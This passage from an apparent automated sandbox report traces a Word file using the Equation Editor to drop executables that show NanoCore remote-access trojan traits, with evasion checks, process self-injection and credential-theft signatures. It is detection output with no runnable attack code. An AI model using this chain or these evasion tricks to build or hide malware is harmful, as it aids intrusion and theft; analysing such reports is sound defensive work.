      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\dll.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\dll.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\dll.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\dll.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\dll.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2608Thread sleep time: -300000s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe TID: 2200Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe TID: 732Thread sleep time: -160000s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWindow / User API: threadDelayed 546
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWindow / User API: foregroundWindowGot 391
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWindow / User API: foregroundWindowGot 389
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Roaming\dll.exeAPI call chain: ExitProcess graph end node
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeAPI call chain: ExitProcess graph end node
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeAPI call chain: ExitProcess graph end node
      Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeAPI call chain: ExitProcess graph end node
      Source: dll.exe, 00000004.00000002.933019468.0000000000624000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information queried: ProcessInformation
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_043B0E1E GetSystemInfo,
      Source: C:\Users\user\AppData\Roaming\dll.exeCode function: 4_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
      Source: C:\Users\user\AppData\Roaming\dll.exeCode function: 4_2_0040699E FindFirstFileW,FindClose,
      Source: C:\Users\user\AppData\Roaming\dll.exeCode function: 4_2_0040290B FindFirstFileW,
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_0040572A FindFirstFileExW,
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 5_2_002603F8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 5_2_0026061D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 5_2_002606F7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 5_2_00260736 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 5_2_00260772 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_0040423E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeProcess queried: DebugPort
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 5_2_004071A5 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 5_2_004071A5 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 5_2_0040819A __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess token adjusted: Debug
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeMemory allocated: page read and write | page guard
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 5_2_004040DE SetUnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 5_2_0040410F SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_00401E5F SetUnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_00401CCC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_004050D9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_00401F70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
      Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 8_2_0040410F SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 8_2_004040DE SetUnhandledExceptionFilter,

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeMemory written: C:\Users\user\AppData\Local\Temp\jqenyeo.exe base: 400000 value starts with: 4D5A
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\dll.exe C:\Users\user\AppData\Roaming\dll.exe
      Source: C:\Users\user\AppData\Roaming\dll.exeProcess created: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess created: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk
      Source: jqenyeo.exe, 00000007.00000002.1177349717.0000000002271000.00000004.00000800.00020000.00000000.sdmp, jqenyeo.exe, 00000007.00000002.1177482267.0000000002411000.00000004.00000800.00020000.00000000.sdmp, jqenyeo.exe, 00000007.00000002.1177394841.00000000022F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerH
      Source: jqenyeo.exe, 00000007.00000002.1177349717.0000000002271000.00000004.00000800.00020000.00000000.sdmp, jqenyeo.exe, 00000007.00000002.1177482267.0000000002411000.00000004.00000800.00020000.00000000.sdmp, jqenyeo.exe, 00000007.00000002.1177394841.00000000022F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: jqenyeo.exe, 00000007.00000002.1177195760.00000000005ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dProgram Manager$b/
      Source: jqenyeo.exe, 00000007.00000002.1177251395.000000000067C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerity Mode] - Microsoft Wordrosoft Word
      Source: jqenyeo.exe, 00000007.00000002.1177349717.0000000002271000.00000004.00000800.00020000.00000000.sdmp, jqenyeo.exe, 00000007.00000002.1177482267.0000000002411000.00000004.00000800.00020000.00000000.sdmp, jqenyeo.exe, 00000007.00000002.1177394841.00000000022F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager<
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 5_2_00404D5C cpuid
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 5_2_00403C2E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
      Source: C:\Users\user\AppData\Roaming\dll.exeCode function: 4_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 7.2.jqenyeo.exe.414058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.4ae4629.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.32f4415.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.5fb140.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.550000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.550000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.5fb140.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.0.jqenyeo.exe.400000.10.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.jqenyeo.exe.330000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.jqenyeo.exe.330000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.32efdec.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.4ae0000.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.jqenyeo.exe.341658.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.32efdec.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.414058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.1ed0000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.jqenyeo.exe.341658.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.32eafb6.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.4ae0000.11.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000007.00000002.1177072990.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000000.925605410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1177611685.00000000032E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000000.924356311.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1177965597.0000000004AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.930427801.0000000000330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1177133041.0000000000550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1177349717.0000000002271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1177195760.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1177296193.0000000001ED2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: jqenyeo.exe PID: 808, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: jqenyeo.exe PID: 324, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: jqenyeo.exe, 00000005.00000002.930427801.0000000000330000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: jqenyeo.exeString found in binary or memory: NanoCore.ClientPluginHost
      Source: jqenyeo.exe, 00000007.00000002.1177072990.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: jqenyeo.exe, 00000007.00000002.1177611685.00000000032E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: jqenyeo.exe, 00000007.00000002.1177611685.00000000032E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: jqenyeo.exe, 00000007.00000000.925605410.0000000000414000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: jqenyeo.exe, 00000007.00000002.1177965597.0000000004AE0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: jqenyeo.exe, 00000007.00000002.1177133041.0000000000550000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: jqenyeo.exe, 00000007.00000002.1177349717.0000000002271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: jqenyeo.exe, 00000007.00000002.1177349717.0000000002271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: jqenyeo.exe, 00000007.00000002.1177195760.00000000005ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: jqenyeo.exe, 00000007.00000002.1177875614.00000000047B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: jqenyeo.exe, 00000007.00000002.1177875614.00000000047B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2Ge